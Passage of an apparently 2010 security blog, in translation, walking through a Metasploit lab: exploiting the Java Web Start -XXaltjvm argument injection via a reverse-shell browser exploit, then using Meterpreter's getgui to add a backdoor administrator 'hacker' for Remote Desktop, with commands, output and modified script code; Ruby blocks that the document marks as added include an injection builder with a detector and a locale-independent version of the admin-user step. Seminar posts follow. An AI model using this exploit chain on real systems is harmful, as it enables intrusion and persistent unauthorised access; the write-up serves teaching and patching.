Wednesday, May 12, 2010


Apache Java Web Start Metasploit + Remote Desktop Getgui

Another Metasploit lab. I think this is one of the most dangerous exploits compared with the ones shown previously, because in my tests it was not detected by AV. The flaw lies in Java Web Start, the binary called javaws.exe: the validation of the arguments it receives from a launch URL is minimal, so arbitrary command-line switches can be injected into it. The flaw was discovered in parallel by Tavis Ormandy and Rubén Santamarta.

"The command-line switch '-XXaltjvm' and, interestingly, '-J-XXaltjvm' (see the -J switch of javaws.exe). This tells Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil, so javaw.exe loads our evil jvm.dll. Adios ASLR, DEP...", Santamarta said in his advisory.



A good write-up of the flaw is at this link (see the references at the end of the post).
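As an added illustration, not code from the original post or from the Metasploit module, the following Ruby models the injection Santamarta describes and a simple check that flags it. The launch value is the legitimate URL followed by a smuggled -J switch; the detector tokenises the value on whitespace, the way the vulnerable javaws treated the string it was handed, and reports any token after the first that is a JVM switch or a bare UNC path. The URL, the 192.0.2.10 host, the share name and the sample values are constructed for the example.

```ruby
# Added example, not code from the original post or from the Metasploit
# module: a model of the javaws argument injection plus a detector for it.
# All URLs, hosts and share names below are constructed for the example.

# javaws.exe accepted JVM switches smuggled into the launch string, so a
# crafted page could append "-J-XXaltjvm=\\host\share" and have the victim
# load an attacker-controlled jvm.dll from that UNC path.
def build_injected_launch(jnlp_url, unc_share)
  # -J hands the rest of the token to the JVM; -XXaltjvm points it at a
  # directory from which it expects to load jvm.dll.
  "#{jnlp_url} -J-XXaltjvm=#{unc_share}"
end

# Switch families that must never come from a web page: anything passed
# straight to the JVM (-J), HotSpot tuning (-XX) and the classic code
# loading switches.
DANGEROUS_SWITCH = /\A-(J|XX|Xbootclasspath|Xrun|javaagent)/i
# A bare UNC path (\\host\share...) in the argument list is equally suspect.
UNC_PATH = /\A\\\\[^\\\s]+\\/

# Tokenise the launch value on whitespace, the way the vulnerable javaws
# treated the string it received, and return every token after the first
# (the legitimate target) that looks like an injected switch or UNC path.
def injected_switches(launch_value)
  tokens = launch_value.to_s.split(/\s+/)
  tokens.drop(1).select { |t| t =~ DANGEROUS_SWITCH || t =~ UNC_PATH }
end

def suspicious?(launch_value)
  !injected_switches(launch_value).empty?
end

# Constructed launch values, as a malicious page might hand them to javaws.
SAMPLES = [
  "http://example.test/app.jnlp",                                      # benign
  "http://example.test/app.jnlp -J-XXaltjvm=\\\\192.0.2.10\\evil",       # altjvm
  "http://example.test/app.jnlp -J-Xbootclasspath/a:\\\\192.0.2.10\\s",  # other
]

if __FILE__ == $0
  SAMPLES.each do |s|
    tag = suspicious?(s) ? "INJECTED" : "clean   "
    puts "#{tag}  #{s}  #{injected_switches(s).inspect}"
  end
end
```

The detector flags the whole -J and -XX families rather than only -XXaltjvm because -J passes everything after it to the JVM, so once a page can append switches any JVM option reaches the process; blocking one switch name would not close the hole.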


To run this exploit from the Metasploit Framework we must be root on the attacking machine and must not have any SMB server running: the module serves the malicious jvm.dll from a share that the victim reaches over a UNC path, so Metasploit needs to bind port 445 itself. The other requirement is that the WebClient service be running on the victim machine. One way to check whether the service is running is to look for "WebClient" in the Services console (services.msc), or to run "sc query WebClient" from a command prompt and read the STATE line.



Metasploit
To demonstrate the flaw we will use the popular Metasploit, loading the exploit called java_ws_arginject_altjvm. Below is the whole script for loading the exploit, except for the payload part, which you already saw in the previous posts on Metasploit :)


# msfconsole
msf > use exploit/multi/browser/java_ws_arginject_altjvm
msf exploit(java_ws_arginject_altjvm) > set SRVHOST 192.168.56.1
SRVHOST => 192.168.56.1
msf exploit(java_ws_arginject_altjvm) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(java_ws_arginject_altjvm) > set LPORT 3333
LPORT => 3333
msf exploit(java_ws_arginject_altjvm) > exploit
[*] Started reverse handler on 192.168.56.1:3333
[*] Using URL: http://192.168.56.1:80/
[*] Server started.


Now we only need the victim to browse to the server the MSF has started, which serves the malicious HTML page.

The virtual machine is Windows XP SP3 and the Java version is:

C:\Documents and Settings\victim 2>java -version
java version "1.6.0_18"
Java(TM) SE Runtime Environment (build 1.6.0_18-b07)
Java HotSpot(TM) Client VM (build 16.0-b13, mixed mode, sharing)

Updating Java to a later version, 1.6.0_20 onward, is recommended, since that is where the patch is and the vulnerability is rated at maximum criticality.

Of all the browser exploits I have tried so far this is one of the most dangerous, since it is independent of the browser, and AV so far (as far as I have seen) has no signature for it, odd as that may seem...



REMOTE DESKTOP


When we get a Meterpreter session we have many features available, such as migrating between processes, keylogging, screenshots, capturing keystrokes, etc.

The option we will look at is a script that enables Terminal Services (Remote Desktop) on the victim machine, but to use it without problems on an English Windows we will have to modify the code where it places the user in the Administrators group. The script is called getgui. To modify it we go to the directory where the scripts live, in my case:

/opt/metasploit3/msf3/scripts/meterpreter

The Meterpreter scripts are on this path. As you can see, getgui gives us several options, one of which is the language, passed with -l, but only English (en_EN) and German (de_DE) are offered.



meterpreter > run getgui -h
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or:    getgui -e

OPTIONS:

    -e        Enable RDP only.
    -f        Forward RDP Connection.
    -h        Help menu.
    -l        The language switch
              Possible Options: 'de_DE', 'en_EN' / default is: 'en_EN'
    -p        The password of the user to add.
    -u        The Username of the user to add.






What we do is edit the file getgui.rb:

# nano /opt/metasploit3/msf3/scripts/meterpreter/getgui.rb

We go to line 113 and change this piece of code:

case lang
when "en_EN"
  rdu = "Remote Desktop Users"
  admin = "Administrators"
when "de_DE"
  rdu = "Remotedesktopbenutzer"
  admin = "Administrator"
end

to this one, adding a branch for en_US:

case lang
when "en_EN"
  rdu = "Remote Desktop Users"
  admin = "Administrators"
when "de_DE"
  rdu = "Remotedesktopbenutzer"
  admin = "Administrator"
when "en_US"
  rdu = "Remote Desktop Users"
  admin = "Administrators"
end
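The language switch exists because getgui adds the user with "net localgroup", which needs the localized group name, so every Windows language needs its own "when" branch and an unlisted locale leaves the script without a name to use. As an added example, not part of the original post or of getgui.rb, the following Ruby resolves the two built-in groups by their well-known SIDs, which are identical on every locale (S-1-5-32-544 is Administrators, S-1-5-32-555 is Remote Desktop Users), using the wmic command that XP SP3 ships with. The command runner here is a constructed stand-in that returns German wmic output; in a Meterpreter script you would replace it with whatever executes a command on the target and returns its stdout. The user name "hacker" is taken from the post; the German output lines are constructed.

```ruby
# Added example, not part of the original post or of getgui.rb: resolve the
# built-in groups by well-known SID instead of by localized name, so the
# user can be added on any Windows language without a per-locale branch.

WELL_KNOWN_SIDS = {
  admins: "S-1-5-32-544",   # Administrators
  rdp:    "S-1-5-32-555",   # Remote Desktop Users
}

# Command to run on the target (XP SP3 ships wmic). It prints a "Name"
# header line followed by the localized group name.
def wmic_group_query(sid)
  %(wmic group where "SID='#{sid}'" get Name)
end

# Parse wmic output: header "Name", then the value; nil if no group matched.
def parse_wmic_name(output)
  lines = output.to_s.split(/\r?\n/).map(&:strip).reject(&:empty?)
  return nil if lines.empty? || lines.first.casecmp("Name") != 0
  lines[1]
end

# Build the two "net localgroup ... /add" commands getgui issues, with the
# group names resolved on the target. `resolver` takes a command line and
# returns its stdout (on a real target: whatever runs commands in the session).
def localgroup_add_commands(user, resolver)
  WELL_KNOWN_SIDS.map do |role, sid|
    name = parse_wmic_name(resolver.call(wmic_group_query(sid)))
    raise "cannot resolve #{role} (#{sid}) on target" if name.nil?
    %(net localgroup "#{name}" #{user} /add)
  end
end

# Constructed stand-in for a German XP target (no real target is contacted).
FAKE_TARGET = lambda do |cmd|
  case cmd
  when /S-1-5-32-544/ then "Name                 \r\nAdministratoren      \r\n\r\n"
  when /S-1-5-32-555/ then "Name                 \r\nRemotedesktopbenutzer\r\n\r\n"
  else "Name  \r\n\r\n"   # wmic found nothing
  end
end

if __FILE__ == $0
  puts localgroup_add_commands("hacker", FAKE_TARGET)
end
```

Resolving by SID also removes the need for the -l switch entirely: the same two commands work on an English, German or Spanish target, and a failed lookup aborts before the script claims the user was added.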
Once we have changed it, we go back to our Meterpreter session and run:

meterpreter > run getgui -u hacker -p 123456 -l es_ES
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Language set by user to: 'es_ES'
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] Setting user account for logon
[*] Adding User: hacker with Password: 123456
[*] Adding User: hacker to local group 'Remote Desktop Users'
[*] Adding User: hacker to local group 'Administrators'
[*] You can now login with the user created


 

What this does is create a user "hacker" with password "123456" in the "Administrators" group, which can log in through Remote Desktop because it is also in "Remote Desktop Users". Now, to see that it works, we go to a shell and connect with the rdesktop program (if you do not have it and you are on a Debian-like distro: aptitude install rdesktop).

$ rdesktop 192.168.56.101

That's all. Greetings.
REFERENCES

http://blog.metasploit.com/2010/04/java-web-start-argument-injection.html
http://seclists.org/fulldisclosure/2010/Apr/119
http://www.pentester.es/2010/05/explotando-java-web-start.html
http://www.pentester.es/2010/05/vulnerabilidad-en-java-web-start.html
http://threatpost.com/es_la/blogs/nueva-failure-in-java-affects-all-the-versions-of-windows-040910


Summary of the First Seminar

Well, on Saturday the 8th of this month Del Prado picked me up at 5 am to go with Sergio Lobera and Gerardo Faifer. First stop RCIA, to pick up Cacivio and Marina at their home; we loaded the car with a few mates and the two new Dells Cacivio had bought for the group, and set off for Formosa. We arrived around 8 am with the help of Prado's GPS. Well, the schedule ended up different from the one planned, and went like this:
















Internet Danger - Metasploit Framework and Backdoor Use (Speaker: Juan Francisco Bosco)
Phishing - Theft and Use of Information (Speaker: Sergio Lobera)
12:00. BREAK, with a barbecue ;)
Identity Theft and Data Security (Presenter: Pedro Matías Cacivio)
Forensic Analysis (Presenter: Sebastián del Prado)
Use of PHP by Hackers (Presenter: Alejandro Zapiola)

As for the organization, it was very good; the Micronet guys were very efficient in that respect: coffee, chipacitos, a large hall, accreditation, etc. We hope the group comes back for more seminars. Here are some pictures!

Me presenting
The Micronet guys

MORE PHOTOS OF THE EVENT WILL BE UPLOADED HERE SOON ;) GREETINGS

Tuesday, May 4, 2010


1st Computer Security Seminar - Formosa 2010

This Saturday, May 8, we travel to Formosa with the group to hold a seminar on security, as the title says. We are very enthusiastic because we love doing these events, and along the way we discover cities in Argentina that are beautiful and in no way inferior to those of any other country.

As always at these events, you meet new people, if you are lucky a good friend, and you learn a lot. Without much more to say, I leave you below the topics that will be given and who will present them; it is going to be good, as there is a lot of content connecting the talks. For people in Formosa Capital, the hall where the event takes place is the assembly hall (Salón de Actos) of the Provincial Highway Department. More information HERE.




8:00. ACCREDITATION

8:30. Identity Theft and Data Security (Presenter: Pedro Matías Cacivio)
Today we inadvertently leave a lot of information on the Internet (passwords, phone numbers, e-mail addresses, postal addresses, photos, etc.) in different databases, all supposedly designed to protect our privacy. What happens when an experienced attacker gets access to all that information? This talk will show how the security of these databases can be completely violated to obtain all the information, which can then be used against us, while the attacker remains completely invisible on the net, committing crimes without trace and without any possibility of being caught.

10:00. Phishing - Theft and Use of Information (Speaker: Sergio Lobera)
It will be shown how a person can, through social engineering, collect the vital data needed to steal accounts and identities and use them. Ways of detecting these attacks, protecting against them and subsequently reporting (blacklisting) phishing sites and domains will be taught. Finally, an attack via phishing will be shown in which multiple passwords for all kinds of accounts (Rapidshare, Facebook, PayPal, etc.) are obtained.

12:00. BREAK

13:30. Internet Danger - Metasploit Framework and Backdoor Use (Speaker: Juan Francisco Bosco)
It will be shown how an attacker, exploiting security flaws and using the Internet as the means of access, compromises personal computers in their entirety, along with the data they contain; for this, the free tool Metasploit Framework will be used against bugs in operating systems. It will also be shown how to create a backdoor and use crypters to bypass AV signatures, compromising victims invisibly.

15:00. Use of PHP by Hackers (Presenter: Alejandro Zapiola)
This talk will focus on how cyber-criminals use PHP to create tools, on cookie theft, XSS flaws and PHP programming errors, exploiting them to take over the victim's identity, and then on how to overcome these weaknesses.

16:00. Intrusion Detection System (IDS) (Presenter: Sebastián del Prado)
It will cover the proper installation, configuration and planning of security rules using the free IDS Snort, as well as sniffer handling and Oinkmaster (rule updates); the installation of IPCop (a security-oriented Linux distribution that has Snort as its main engine) with a pleasant interface, iptables management, and handling of environments (Green, Blue, Orange topologies); and videos with examples of real attacks and how they show up, etc.

18:00. CLOSING. Delivery of certificates.